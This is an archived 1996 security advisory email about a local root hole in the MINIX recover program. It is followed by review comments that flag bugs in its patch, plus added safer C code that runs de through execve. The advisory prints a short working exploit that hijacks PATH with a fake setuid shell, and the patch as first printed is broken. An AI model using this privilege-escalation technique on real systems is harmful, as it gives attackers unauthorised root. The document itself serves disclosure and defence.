From demonika@dimensional.com Sun Aug 4 20:18:34 1996
Date: Sat, 3 Aug 1996 19:14:20 -0600 (MDT)
From: Monika DeMire
To: Damien Sorder
Subject: minix

EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH
SECURITY ALERT - MINIX RECOVER(0)
EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH

Security hole in: recover(0)
Compromises:      root privs
Exploitable:      locally
Quick fix:        chmod -s recover
Better fix:       (see below)

Description:

There is a hole in the MINIX program recover(0) which allows any local user with access to the program to acquire unauthorised root privileges. The vulnerability lies in an improper system call to de(0) which does not use an absolute pathname. Because of the trivial nature of creating an exploit, it is advised that all MINIX users install a new and safer recover.

This alert is not the first version. If you obtained an earlier version, you should apply the new patch below, as there were more potential problems in the first version of the patch.

Exploit:

$ cat > de.c
#include
#include
main (void)
{
    setuid(0);
    setgid(0);
    execv("/usr/bin/sh", 0);
    return(0);
}
^D
$ cc -o de de.c
$ PATH=.
$ /usr/bin/recover foop
#

Fix:

Fix by Chris F. Patch this on /usr/src/commands/simple/recover.c and recompile. It is worthy of note that this solution may not be enough if de(0) makes equally block-headed moves; therefore systems with security in mind should make the quick fix the only fix.

------CUT HERE------
19a20
> #include
23a25,26
> #define PATH_DE "/usr/bin/de -r "
>
33a37,41
> if (strncmp(getenv("IFS"), "/", sizeof(char))) {
> printf("You will not get root that easily!\n");
> exit(1);
> }
>
37,38c45,46
< strcpy(buf, "de -r ");
< strcat(buf, argv[i]);
---
> strcpy(buf, PATH_DE));
> strncat(buf, argv[i], sizeof(buf) - sizeof(PATH_DE));
------CUT HERE------

Footers:

Report by Chris F.
Subscribers to the EMH mailing list need only
$ mail -s subscribe emh-request@lists.uchsc.edu < /dev/null
to be included.
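Review bot: the IFS test in the `33a37,41` hunk is inverted and unsafe as written. `strncmp(getenv("IFS"), "/", sizeof(char))` returns non-zero when IFS does not begin with `/`, so the "You will not get root that easily!" refusal fires for ordinary callers while an IFS that starts with `/` is let through; it also dereferences `getenv("IFS")` without a NULL check (IFS is unset in the normal case, so recover crashes) and only inspects the first character. Suggest `const char *ifs = getenv("IFS"); if (ifs != NULL && strchr(ifs, '/') != NULL) { printf(...); exit(1); }`, which also needs the header added in the `19a20` hunk.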
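Review bot: `strcpy(buf, PATH_DE));` in the `37,38c45,46` hunk has an unbalanced closing parenthesis and will not compile; it should read `strcpy(buf, PATH_DE);`. The `strncat` bound `sizeof(buf) - sizeof(PATH_DE)` fills `buf` exactly (the `- sizeof(PATH_DE)` already accounts for the NUL), but it is only correct if `buf` is a local array in that scope rather than a pointer parameter, since `sizeof` a pointer is not the buffer length; worth confirming against the declaration, which this hunk does not show.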
EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH
EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH - EMH
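Added example, my code rather than the advisory's patch or anything from MINIX: the IFS check the patch attempts, done as a NULL-safe whole-string test, and a way for a recover(0)-style wrapper to invoke de(0) without going through the shell at all, so that neither PATH nor IFS from the caller can change what gets executed. It assumes de takes `-r <file>` as in the patch's PATH_DE; `de_path` is a parameter only so the function can be exercised against /bin/echo where de(0) does not exist.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define PATH_DE     "/usr/bin/de"   /* absolute path, as in the advisory's patch */
#define DEFAULT_IFS " \t\n"         /* the only IFS a setuid program should accept */

/* 1 if IFS is unset or contains only the default whitespace, 0 otherwise.
 * Unlike the patch on the page this tolerates a missing IFS (getenv returns
 * NULL) and inspects every character, not just the first one. */
int ifs_is_safe(const char *ifs)
{
    if (ifs == NULL)
        return 1;
    return strspn(ifs, DEFAULT_IFS) == strlen(ifs);
}

/* Run de directly with execve: argv is fixed by us, the environment is
 * emptied, and no shell is involved, so a caller's PATH=. or IFS=/ is
 * irrelevant.  Returns the child's exit status, 127 if the exec failed,
 * or -1 if fork/waitpid failed. */
int run_de(const char *de_path, const char *file)
{
    char *argv[] = { (char *)de_path, "-r", (char *)file, NULL };
    char *envp[] = { NULL };            /* nothing inherited from the caller */
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(de_path, argv, envp);
        _exit(127);                     /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

In the real program the first argument would be PATH_DE; with this approach the IFS check becomes belt-and-braces rather than the thing standing between a local user and root.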